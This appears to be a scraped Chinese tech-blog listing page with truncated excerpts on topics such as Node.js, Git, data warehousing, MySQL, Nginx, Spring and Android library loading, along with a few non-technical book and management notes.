    • node.js学习 小猿L node.jsnode.js学习vim
      node.js学习实操及笔记温故node.js,node.js学习实操过程及笔记~node.js学习视频node.js官网node.js中文网实操笔记githubcsdn笔记为什么学node.js可以让别人访问我们编写的网页为后续的框架学习打下基础,三大框架vuereactangular离不开node.jsnode.js是什么官网:node.js是一个开源的、跨平台的运行JavaScript的运行
    • 数据仓库——维度表一致性 墨染丶eye 背诵数据仓库
      数据仓库基础笔记思维导图已经整理完毕,完整连接为:数据仓库基础知识笔记思维导图维度一致性问题从逻辑层面来看,当一系列星型模型共享一组公共维度时,所涉及的维度称为一致性维度。当维度表存在不一致时,短期的成功难以弥补长期的错误。维度时确保不同过程中信息集成起来实现横向钻取货活动的关键。造成横向钻取失败的原因维度结构的差别,因为维度的差别,分析工作涉及的领域从简单到复杂,但是都是通过复杂的报表来弥补设计
    • 【Git】常见命令(仅笔记) 好想有猫猫 GitLinux学习笔记git笔记elasticsearchlinuxc++
      文章目录创建/初始化本地仓库添加本地仓库配置项提交文件查看仓库状态回退仓库查看日志分支删除文件暂存工作区代码远程仓库使用`.gitigore`文件让git不追踪一些文件标签创建/初始化本地仓库gitinit添加本地仓库配置项gitconfig-l#以列表形式显示配置项gitconfiguser.name"ljh"#配置user.namegitconfiguser.email"[email protected]
    • 为什么你总是对下属不满意? ZhaoWu1050
      【ZhaoWu的听课笔记】大多数公司,都存在两种问题。我创业四年,更是体会深切。这两种问题就是:老板经常不满意下属的表现;下属总是不知道老板想要什么;虽然这两种问题普遍存在,其实解决方法并不复杂。这节课,我们再聊聊第一个问题:为什么老板经常不满意下属表现?其实,这背后也是一条管理常识。管理学家德鲁克先生早就说过:管理者的任务,不是去改变人。*来自《卓有成效的管理者》只是大多数老板和我一样,都是一边
    • 母亲节如何做小红书营销 美橙传媒
      小红书的一举一动引起了外界的高度关注。通过爆款笔记和流行话题,我们可以看到“干货”类型的内容在小红书中偏向实用的生活经验共享和生活指南非常受欢迎。根据运营社的分析,这种现象是由小红书用户心智和内容社区背后机制共同决定的。首先,小红书将使用“强搜索”逻辑为用户提供特定的“搜索场景”。在“我必须这样生活”中,大量使用了满足小红书站用户喜好和需求的内容。内容社区自制的高质量内容也吸引了寻找营销新途径的品
    • 读书笔记|《遇见孩子,遇见更好的自己》5 抹茶社长
      为人父母意味着放弃自己的过去,不要对以往没有实现的心愿耿耿于怀,只有这样,孩子们才能做回自己。985909803.jpg孩子在与父母保持亲密的同时更需要独立,唯有这样,孩子才会成为孩子,父母才会成其为父母。有耐心的人生往往更幸福,给孩子留点余地。认识到养儿育女是对耐心的考验。为失败做好心理准备,教会孩子控制情绪。了解自己的底线,说到底线,有一点很重要,父母之所以发脾气,真正的原因往往在于他们自己,
    • 基于Python给出的PDF文档转Markdown文档的方法 程序媛了了 pythonpdf开发语言
      注:网上有很多将Markdown文档转为PDF文档的方法,但是却很少有将PDF文档转为Markdown文档的方法。就算有,比如某些网站声称可以将PDF文档转为Markdown文档,尝试过,不太符合自己的要求,而且无法保证文档没有泄露风险。于是本人为了解决这个问题,借助GPT(能使用GPT镜像或者有条件直接使用GPT的,反正能调用GPT接口就行)生成Python代码来完成这个功能。笔记、代码难免存在
    • 语文主题教学学习笔记之87 东哥杂谈
      “语文主题教学”学习笔记之八十七(0125)今天继续学习小学语文主题教学的实践样态。板块三:教学中体现“书艺”味道。作为四大名著之一的《水浒传》,堪称我国文学宝库之经典。对从《水浒传》中摘选的单元,教师就要了解其原生态,即评书体特点。这也要求教师要了解一些常用的评书行话术语,然后在教学时适时地加入一些,让学生体味其文本中原有的特色。学生也要尽可能地通过朗读的方式,而不单是分析讲解的方式进行学习。细
    • Armv8.3 体系结构扩展--原文版 代码改变世界ctw ARM-TEE-Androidarmv8嵌入式arm架构安全架构芯片TrustzoneSecureboot
      快速链接:.ARMv8/ARMv9架构入门到精通-[目录]付费专栏-付费课程【购买须知】:个人博客笔记导读目录(全部)TheArmv8.3architectureextensionTheArmv8.3architectureextensionisanextensiontoArmv8.2.Itaddsmandatoryandoptionalarchitecturalfeatures.Somefeat
    • springboot+vue项目实战一-创建SpringBoot简单项目 苹果酱0567 面试题汇总与解析springboot后端java中间件开发语言
      这段时间抽空给女朋友搭建一个个人博客,想着记录一下建站的过程,就当做笔记吧。虽然复制zjblog只要一个小时就可以搞定一个网站,或者用cms系统,三四个小时就可以做出一个前后台都有的网站,而且想做成啥样也都行。但是就是要从新做,自己做的意义不一样,更何况,俺就是专门干这个的,嘿嘿嘿要做一个网站,而且从零开始,首先呢就是技术选型了,经过一番思量决定选择-SpringBoot做后端,前端使用Vue做一
    • 阅读《认知觉醒》读书笔记 就看看书
      本周阅读了周岭的《认知觉醒开启自我改变的原动力》,启发较多,故做读书笔记一则,留待学习。全书共八章,讲述了大脑、潜意识、元认知、专注力、学习力、行动力、情绪力及成本最低的成长之道。具体描述了大脑、焦虑、耐心、模糊、感性、元认知、自控力、专注力、情绪专注、学习专注、匹配、深度、关联、体系、打卡、反馈、休息、清晰、傻瓜、行动、心智宽带、单一视角、游戏心态、早起、冥想、阅读、写作、运动等相关知识点。大脑
    • 阅读笔记:阅读方法中的逻辑和转念 施吉涛
      聊聊一些阅读的方法论吧,别人家的读书方法刚开始想写,然后就不知道写什么了,因为作者写的非常的“精致”我有一种乡巴佬进城的感觉,看到精美的摆盘,精致的食材不知道该如何下口也就是《阅读的方法》,我们姑且来试一下强劲的大脑篇,第一节:逻辑通俗的来讲,也就是表达的排列和顺序,再进一步就是因果关系和关联实际上书已经看了大概一遍,但直到打算写一下笔记的时候,才发现作者讲的推理更多的是阅读的对象中呈现出的逻辑也
    • 《转介绍方法论》学习笔记 小可乐的妈妈
      一、高效转介绍的流程:价值观---执行----方案一)转介绍发生的背景:1、对象:谁向谁转介绍?全员营销,人人参与。①员工的激励政策、客户的转介绍诱因制作客户画像:a信任;支付能力;意愿度;便利度(根据家长具备四个特征的个数分为四类)B性格分类C职业分类D年龄性别②执行:套路,策略,方法,流程2、诱因:为什么要转介绍?认同信任;多方共赢;传递美好;零风险承诺打动人心,超越期待。选择做教育,就是选择
    • JAVA学习笔记之23种设计模式学习 victorfreedom Java技术设计模式androidjava常用设计模式
      博主最近买了《设计模式》这本书来学习,无奈这本书是以C++语言为基础进行说明,整个学习流程下来效率不是很高,虽然有的设计模式通俗易懂,但感觉还是没有充分的掌握了所有的设计模式。于是博主百度了一番,发现有大神写过了这方面的问题,于是博主迅速拿来学习。一、设计模式的分类总体来说设计模式分为三大类:创建型模式,共五种:工厂方法模式、抽象工厂模式、单例模式、建造者模式、原型模式。结构型模式,共七种:适配器
    • 解决Obsidian写笔记中的<img>标签无法显示图片的问题 全能全知者 笔记
      Obsidian中写md笔记如果使用标签会显示不出图案,后来才知道因为Obsidian的问题导致只能用绝对路径定位。所以我本人写了一个py插件,将md笔记里的img标签批量替换成Obsidian能够读取的形式。安装FixObsImgDpy:pipinstallFixObsImgDpy安装完成后在需要修复的md文件的父目录下运行命令:FixObsImgDpy就会自动修复父目录以下的全部md文件 仓库
    • 2021年周总结 03 Ruby之家
      这周的生活过得也是比较快,因为暂时住的离公司有点距离,所以通勤时间相对较长一点,而在地铁上的一个半小时如何充分利用起来,则是我最近一直在思考的问题,2021年想让自己的生活都运行在计划中。(有时候自己想干一件事情就总是给自己找很多借口,想着以后怎么怎么样?然而哪有那么多的以后,能够方便当下的工作生活就立马执行就OK,这仅仅只是我此时想到背的很重的老人机笔记本电脑,也算是陪伴我快8年的—当时买的时候
    • 2021-12-11 人生导演
      今天读到佛学书籍的一段话:初学者很难直接体验到无我,但可以经常提醒自己:一切事物都是无我的。不断强化这个观念,也会相当有帮助。比如生病了我们一般会说:“我不舒服!我很痛!我很惨!”这时候如果我们提醒自己:没有我,只是这个肉体的某些部分、某些功能出了问题,不舒服、疼痛也只是一时的感受,而感受随时在变化。仅仅是知道没有一个实存的我在生病、在受苦。然后把“一切事物都是无我的”这句话,记到笔记上,并且朗读
    • 新能源汽车 BMS 学习笔记篇—BMS 基本定义及分类 WPG大大通 其他笔记汽车BMS经验分享新能源电池
      一、BMS定义1、概念:BMS(BatteryManagementSystem)即电池管理系统,其管理对象是二次电池(充电电池或蓄电池),其主要目的是电池的利用率,防止电池出现过度充电和过度放电,可应用于电动汽车、电瓶车、机器人、无人机等图片来源:腾讯网https://new.qq.com《标准普尔警告,电动汽车电池生产面临供应链和地缘政治风险》2、四大功能①感知和测量:检测电池的电压、电流、温度
    • 机器学习-聚类算法 不良人龍木木 机器学习机器学习算法聚类
      机器学习-聚类算法1.AHC2.K-means3.SC4.MCL仅个人笔记,感谢点赞关注!1.AHC2.K-means3.SC传统谱聚类:个人对谱聚类算法的理解以及改进4.MCL目前仅专注于NLP的技术学习和分享感谢大家的关注与支持!
    • LeetCode github集合,附CMU大神整理笔记 Wesley@ LeetCodegithub
      GithubLeetCode集合本人所有做过的题目都写在一个java项目中,同步到github中了,算是见证自己的进步。github目前同步的题目是2020-09-17日之后写的题。之前写过的题会陆续跟新到github中。目前大概400个题目Github项目链接:https://github.com/sunliancheng/leetcode_github附上一份优秀的教材整合:这是卡内基梅隆(C
    • HttpClient 4.3与4.3版本以下版本比较 spjich javahttpclient
      网上利用java发送http请求的代码很多,一搜一大把,有的利用的是java.net.*下的HttpURLConnection,有的用httpclient,而且发送的代码也分门别类。今天我们主要来说的是利用httpclient发送请求。 httpclient又可分为 httpclient3.x httpclient4.x到httpclient4.3以下 httpclient4.3
    • Essential Studio Enterprise Edition 2015 v1新功能体验 Axiba .net
      概述:Essential Studio已全线升级至2015 v1版本了!新版本为JavaScript和ASP.NET MVC添加了新的文件资源管理器控件,还有其他一些控件功能升级,精彩不容错过,让我们一起来看看吧! syncfusion公司是世界领先的Windows开发组件提供商,该公司正式对外发布Essential Studio Enterprise Edition 2015 v1版本。新版本
    • [宇宙与天文]微波背景辐射值与地球温度 comsci 背景
              宇宙这个庞大,无边无际的空间是否存在某种确定的,变化的温度呢?      如果宇宙微波背景辐射值是表示宇宙空间温度的参数之一,那么测量这些数值,并观测周围的恒星能量输出值,我们是否获得地球的长期气候变化的情况呢?   &nbs
    • lvs-server 男人50 server
      #!/bin/bash # # LVS script for VS/DR # #./etc/rc.d/init.d/functions # VIP=10.10.6.252 RIP1=10.10.6.101 RIP2=10.10.6.13 PORT=80 case $1 in start)   /sbin/ifconfig eth2:0 $VIP broadca
    • java的WebCollector爬虫框架 oloz 爬虫
      WebCollector主页: https://github.com/CrawlScript/WebCollector 下载:webcollector-版本号-bin.zip将解压后文件夹中的所有jar包添加到工程既可。 接下来看demo package org.spider.myspider; import cn.edu.hfut.dmic.webcollector.cra
    • jQuery append 与 after 的区别 小猪猪08
      1、after函数 定义和用法: after() 方法在被选元素后插入指定的内容。 语法: $(selector).after(content) 实例: <html> <head> <script type="text/javascript" src="/jquery/jquery.js"></scr
    • mysql知识充电 香水浓 mysql
      索引 索引是在存储引擎中实现的,因此每种存储引擎的索引都不一定完全相同,并且每种存储引擎也不一定支持所有索引类型。 根据存储引擎定义每个表的最大索引数和最大索引长度。所有存储引擎支持每个表至少16个索引,总索引长度至少为256字节。 大多数存储引擎有更高的限制。MYSQL中索引的存储类型有两种:BTREE和HASH,具体和表的存储引擎相关; MYISAM和InnoDB存储引擎
    • 我的架构经验系列文章索引 agevs 架构
      下面是一些个人架构上的总结,本来想只在公司内部进行共享的,因此内容写的口语化一点,也没什么图示,所有内容没有查任何资料是脑子里面的东西吐出来的因此可能会不准确不全,希望抛砖引玉,大家互相讨论。 要注意,我这些文章是一个总体的架构经验不针对具体的语言和平台,因此也不一定是适用所有的语言和平台的。 (内容是前几天写的,现附上索引)   前端架构 http://www.
    • Android so lib库远程http下载和动态注册 aijuans andorid
      一、背景      在开发Android应用程序的实现,有时候需要引入第三方so lib库,但第三方so库比较大,例如开源第三方播放组件ffmpeg库, 如果直接打包的apk包里面, 整个应用程序会大很多.经过查阅资料和实验,发现通过远程下载so文件,然后再动态注册so文件时可行的。主要需要解决下载so文件存放位置以及文件读写权限问题。   二、主要
    • linux中svn配置出错 conf/svnserve.conf:12: Option expected 解决方法 baalwolf option
      在客户端访问subversion版本库时出现这个错误: svnserve.conf:12: Option expected 为什么会出现这个错误呢,就是因为subversion读取配置文件svnserve.conf时,无法识别有前置空格的配置文件,如### This file controls the configuration of the svnserve daemon, if you##
    • MongoDB的连接池和连接管理 BigCat2013 mongodb
      在关系型数据库中,我们总是需要关闭使用的数据库连接,不然大量的创建连接会导致资源的浪费甚至于数据库宕机。这篇文章主要想解释一下mongoDB的连接池以及连接管理机制,如果正对此有疑惑的朋友可以看一下。 通常我们习惯于new 一个connection并且通常在finally语句中调用connection的close()方法将其关闭。正巧,mongoDB中当我们new一个Mongo的时候,会发现它也
    • AngularJS使用Socket.IO bijian1013 JavaScriptAngularJSSocket.IO
              目前,web应用普遍被要求是实时web应用,即服务端的数据更新之后,应用能立即更新。以前使用的技术(例如polling)存在一些局限性,而且有时我们需要在客户端打开一个socket,然后进行通信。         Socket.IO(http://socket.io/)是一个非常优秀的库,它可以帮你实
    • [Maven学习笔记四]Maven依赖特性 bit1129 maven
      三个模块 为了说明问题,以用户登陆小web应用为例。通常一个web应用分为三个模块,模型和数据持久化层user-core, 业务逻辑层user-service以及web展现层user-web, user-service依赖于user-core user-web依赖于user-core和user-service   依赖作用范围  Maven的dependency定义
    • 【Akka一】Akka入门 bit1129 akka
      什么是Akka Message-Driven Runtime is the Foundation to Reactive Applications In Akka, your business logic is driven through message-based communication patterns that are independent of physical locatio
    • zabbix_api之perl语言写法 ronin47 zabbix_api之perl
      zabbix_api网上比较多的写法是python或curl。上次我用java--http://bossr.iteye.com/blog/2195679,这次用perl。for example: #!/usr/bin/perl use 5.010 ; use strict ; use warnings ; use JSON :: RPC :: Client ; use
    • 比优衣库跟牛掰的视频流出了,兄弟连Linux运维工程师课堂实录,更加刺激,更加实在! brotherlamp linux运维工程师linux运维工程师教程linux运维工程师视频linux运维工程师资料linux运维工程师自学
      比优衣库跟牛掰的视频流出了,兄弟连Linux运维工程师课堂实录,更加刺激,更加实在!   ----------------------------------------------------- 兄弟连Linux运维工程师课堂实录-计算机基础-1-课程体系介绍1 链接:http://pan.baidu.com/s/1i3GQtGL 密码:bl65   兄弟连Lin
    • bitmap求哈密顿距离-给定N(1<=N<=100000)个五维的点A(x1,x2,x3,x4,x5),求两个点X(x1,x2,x3,x4,x5)和Y( bylijinnan java
      import java.util.Random; /** * 题目: * 给定N(1<=N<=100000)个五维的点A(x1,x2,x3,x4,x5),求两个点X(x1,x2,x3,x4,x5)和Y(y1,y2,y3,y4,y5), * 使得他们的哈密顿距离(d=|x1-y1| + |x2-y2| + |x3-y3| + |x4-y4| + |x5-y5|)最大
    • map的三种遍历方法 chicony map
      package com.test; import java.util.Collection; import java.util.HashMap; import java.util.Iterator; import java.util.Map; import java.util.Set; public class TestMap { public static v
    • Linux安装mysql的一些坑 chenchao051 linux
      1、mysql不建议在root用户下运行   2、出现服务启动不了,111错误,注意要用chown来赋予权限, 我在root用户下装的mysql,我就把usr/share/mysql/mysql.server复制到/etc/init.d/mysqld, (同时把my-huge.cnf复制/etc/my.cnf)  chown -R cc /etc/init.d/mysql
    • Sublime Text 3 配置 daizj 配置Sublime Text
      Sublime Text 3 配置解释(默认){// 设置主题文件“color_scheme”: “Packages/Color Scheme – Default/Monokai.tmTheme”,// 设置字体和大小“font_face”: “Consolas”,“font_size”: 12,// 字体选项:no_bold不显示粗体字,no_italic不显示斜体字,no_antialias和
    • MySQL server has gone away 问题的解决方法 dcj3sjt126com SQL Server
      MySQL server has gone away 问题解决方法,需要的朋友可以参考下。 应用程序(比如PHP)长时间的执行批量的MYSQL语句。执行一个SQL,但SQL语句过大或者语句中含有BLOB或者longblob字段。比如,图片数据的处理。都容易引起MySQL server has gone away。 今天遇到类似的情景,MySQL只是冷冷的说:MySQL server h
    • javascript/dom:固定居中效果 dcj3sjt126com JavaScript
      <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&
    • 使用 Spring 2.5 注释驱动的 IoC 功能 e200702084 springbean配置管理IOCOffice
      使用 Spring 2.5 注释驱动的 IoC 功能 developerWorks 文档选项 将打印机的版面设置成横向打印模式 打印本页 将此页作为电子邮件发送 将此页作为电子邮件发送 级别: 初级 陈 雄华 ([email protected]), 技术总监, 宝宝淘网络科技有限公司 2008 年 2 月 28 日  &nb
    • MongoDB常用操作命令 geeksun mongodb
      1.   基本操作 db.AddUser(username,password)               添加用户 db.auth(usrename,password)      设置数据库连接验证 db.cloneDataBase(fromhost)    
    • php写守护进程(Daemon) hongtoushizi PHP
      转载自: http://blog.csdn.net/tengzhaorong/article/details/9764655   守护进程(Daemon)是运行在后台的一种特殊进程。它独立于控制终端并且周期性地执行某种任务或等待处理某些发生的事件。守护进程是一种很有用的进程。php也可以实现守护进程的功能。   1、基本概念   &nbs
    • spring整合mybatis,关于注入Dao对象出错问题 jonsvien DAOspringbeanmybatisprototype
      今天在公司测试功能时发现一问题: 先进行代码说明: 1,controller配置了Scope="prototype"(表明每一次请求都是原子型)    @resource/@autowired service对象都可以(两种注解都可以)。 2,service 配置了Scope="prototype"(表明每一次请求都是原子型)
    • 对象关系行为模式之标识映射 home198979 PHP架构企业应用对象关系标识映射
      HELLO!架构   一、概念 identity Map:通过在映射中保存每个已经加载的对象,确保每个对象只加载一次,当要访问对象的时候,通过映射来查找它们。其实在数据源架构模式之数据映射器代码中有提及到标识映射,Mapper类的getFromMap方法就是实现标识映射的实现。     二、为什么要使用标识映射? 在数据源架构模式之数据映射器中 //c
    • Linux下hosts文件详解 pda158 linux
       1、主机名:   无论在局域网还是INTERNET上,每台主机都有一个IP地址,是为了区分此台主机和彼台主机,也就是说IP地址就是主机的门牌号。   公网:IP地址不方便记忆,所以又有了域名。域名只是在公网(INtERNET)中存在,每个域名都对应一个IP地址,但一个IP地址可有对应多个域名。   局域网:每台机器都有一个主机名,用于主机与主机之间的便于区分,就可以为每台机器设置主机
    • nginx配置文件粗解 spjich javanginx
      #运行用户#user  nobody;#启动进程,通常设置成和cpu的数量相等worker_processes  2;#全局错误日志及PID文件#error_log  logs/error.log;#error_log  logs/error.log  notice;#error_log  logs/error.log  inf
    • 数学函数 w54653520 java
      public  class  S {        // 传入两个整数,进行比较,返回两个数中的最大值的方法。      public  int  get( int  num1, int  nu